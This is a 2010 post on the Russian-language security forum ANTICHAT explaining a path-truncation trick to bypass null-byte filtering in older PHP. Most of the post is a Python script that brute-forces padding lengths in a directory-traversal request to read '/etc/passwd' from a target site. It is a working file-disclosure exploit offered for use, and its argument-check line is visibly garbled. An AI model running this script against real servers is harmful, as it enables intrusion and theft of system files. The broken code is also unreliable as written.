HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Обход фильтрации нуль байта
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 07.09.2010, 23:58
overxor
Новичок
Регистрация: 11.09.2009
Сообщений: 23
Провел на форуме:
64270

Репутация: 23
Отправить сообщение для overxor с помощью ICQ
По умолчанию
Данный метод работает во всех версиях php кроме последней 5.3.3

Смысл в том, чтобы забивать путь в начале файла произвольными символами.

Код:
Code:
#!/usr/bin/env python
# Null byte filter bypass
import urllib, sys

if len(sys.argv)  [file] [true]: "
	exit()

file = "../../../../../../../etc/passwd";
true = "root"

if len(sys.argv) > 3:
	file = sys.argv[2]
	true = sys.argv[3]

url = sys.argv[1]

for i in xrange(900, 4096):
	sys.stderr.write("\rTry: " + str(i))

	d = "t" * i
	try:
		fd = urllib.urlopen(url + d + file)
	except:
		print "Error connect"
		sys.exit(1)

	data = fd.read()
	fd.close()

	if data.find(true) > -1:
		print '\n', data
		exit(0)
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ